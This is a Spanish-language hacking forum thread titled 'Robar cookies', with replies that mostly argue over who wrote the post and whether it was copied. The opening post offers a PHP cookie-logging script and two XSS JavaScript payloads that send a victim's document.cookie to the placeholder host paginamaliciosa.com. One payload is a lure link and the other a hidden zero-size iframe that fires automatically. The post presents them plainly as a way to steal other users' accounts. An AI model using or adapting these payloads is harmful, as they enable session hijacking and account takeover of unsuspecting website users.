Robar cookies

Iniciado por Windero, Agosto 23, 2013, 07:14:41 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Agosto 23, 2013, 07:14:41 PM Ultima modificación: Agosto 25, 2013, 07:27:42 PM por ZanGetsu
Código: php

<?php

$cookie = $_GET['NOMBRECOOKIE']; // Recibimos el valor del parámetro NOMBRECOOKIE
$conexion = fopen("cookies.txt", "a"); // Abrimos el archivo cookies.txt para escribir al final de él
fwrite($conexion, "$cookie"); // Escribimos el contenido almacenado en la variable $cookie
fclose($conexion); // Cerramos el archivo

?>


Ahora bien, esto no sirve para robar cookies. Con este código simplemente escribes el contenido de NOMBRECOOKIE en la URL (es decir, recibirías lo que hay aquí: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Pero si entras en la página el usuario tendría que escribir su cookie manualmente en el parámetro, y sinceramente hay muchos lammers por el mundo pero no creo que encuentres muchos, y para eso es mejor decirle que te diga la cookie directamente xD

Otra cosa sería que encontraras un XSS  y hagas un enlace malicioso añadiendo la cookie con JavaScript al parámetro:
Código: php

document.write('<a href="http://paginamaliciosa.com/?NOMBRECOOKIE='+document.cookie+'">Haz click aquí para...quedarte sin cuenta.</a>');


Claro, también puedes hacer que el proceso sea automático en el caso de encontrar un XSS y que el usuario no tenga que hacer click, simplemente inyectas un iframe oculto y listo:
Código: php

document.write('<iframe src="http://paginamaliciosa.com/?NOMBRECOOKIE='+document.cookie+'" width="0" height="0" style="display: none;"></iframe>');


Fuente : iDarkHS - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Saludos
-Un trabajo mierdero de una persona es el trabajo a tiempo completo de otra persona. (Jessica Gaston)
Agosto 23, 2013, 07:21:25 PM #1
Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos.  ;)
Agosto 23, 2013, 07:39:46 PM #2
Buen Post, Jeje yo Hice uno Parecido en DD [DestroyDreams]

XNETXBRUJO  ~  MATAR O MORIR.
1328430605
Agosto 23, 2013, 07:48:02 PM #3
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos.  ;)

Créditos: ndk

Fuente: Mi cerebro

Saludos ;)
-Un trabajo mierdero de una persona es el trabajo a tiempo completo de otra persona. (Jessica Gaston)
Agosto 24, 2013, 06:22:41 AM #4
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Por favor, podrías poner los créditos al usuario que escribió esto y de donde los sacaste.

Saludos.  ;)

Créditos: ndk

Fuente: Mi cerebro

Saludos ;)

No es cierto, eso que has copiado y pegado es una respuesta del usuario de Holoscripter: iDarkHS,

Deja de rippear.
Agosto 24, 2013, 07:19:48 AM #5
Estamos ante una plaga de kiddies de HS, please, no más usuarios de un foro en el que se dedican a tirar havij contra holos de habbo.
Sigueme en Twitter : @Sankosk
Estos nuevos staff no tienen puta idea XD
Agosto 24, 2013, 10:33:51 AM #6
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Estamos ante una plaga de kiddies de HS, please, no más usuarios de un foro en el que se dedican a tirar havij contra holos de habbo.
Sanko, que me diga esto un chaval de estos, todavía lo puedo entender.
¿Pero tú?, eso ya no tío, mira entiendo que no te guste que vengan estos individuos y hagan aportes un tanto extraños, pero no debes culpar a una comunidad por un usuario, aparte creo que tienen derecho a aprender (unos más que otros), no creo que nadie haya nacido aprendido.
Y bueno HoloScripter, es una comunidad dedicada al scripting, no al hacking y murió cuando inmortal y cornamenta dejaron de desarrollar las packetlogger con funciones de inyección de paquetes el en los emuladores de los "habbo holos", y seguro que muchos de aquí no tienen los suficientes conocimientos de criptografía que algunos usuarios de HoloScripter.
Dejando de lado el comentario, aver cuando hablamos colega, un saludo y un abrazo :) Sankete!!!
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.
Agosto 24, 2013, 10:49:50 AM #7
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Estamos ante una plaga de kiddies de HS, please, no más usuarios de un foro en el que se dedican a tirar havij contra holos de habbo.
Sanko, que me diga esto un chaval de estos, todavía lo puedo entender.
¿Pero tú?, eso ya no tío, mira entiendo que no te guste que vengan estos individuos y hagan aportes un tanto extraños, pero no debes culpar a una comunidad por un usuario, aparte creo que tienen derecho a aprender (unos más que otros), no creo que nadie haya nacido aprendido.
Y bueno HoloScripter, es una comunidad dedicada al scripting, no al hacking y murió cuando inmortal y cornamenta dejaron de desarrollar las packetlogger con funciones de inyección de paquetes el en los emuladores de los "habbo holos", y seguro que muchos de aquí no tienen los suficientes conocimientos de criptografía que algunos usuarios de HoloScripter.
Dejando de lado el comentario, aver cuando hablamos colega, un saludo y un abrazo :) Sankete!!!

Totalmente de acuerdo, un saludo compa.
Agosto 24, 2013, 10:52:12 AM #8
Como dijeron mas arriba, este post esta rippeado, y no solo eso, sino que dices que es tuyo?

El post es de iDarkHS: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Agrega el autor y la fuente y deja de decir que es tuyo.

Imprimir
Ir Arriba Páginas1
Acciones del Usuario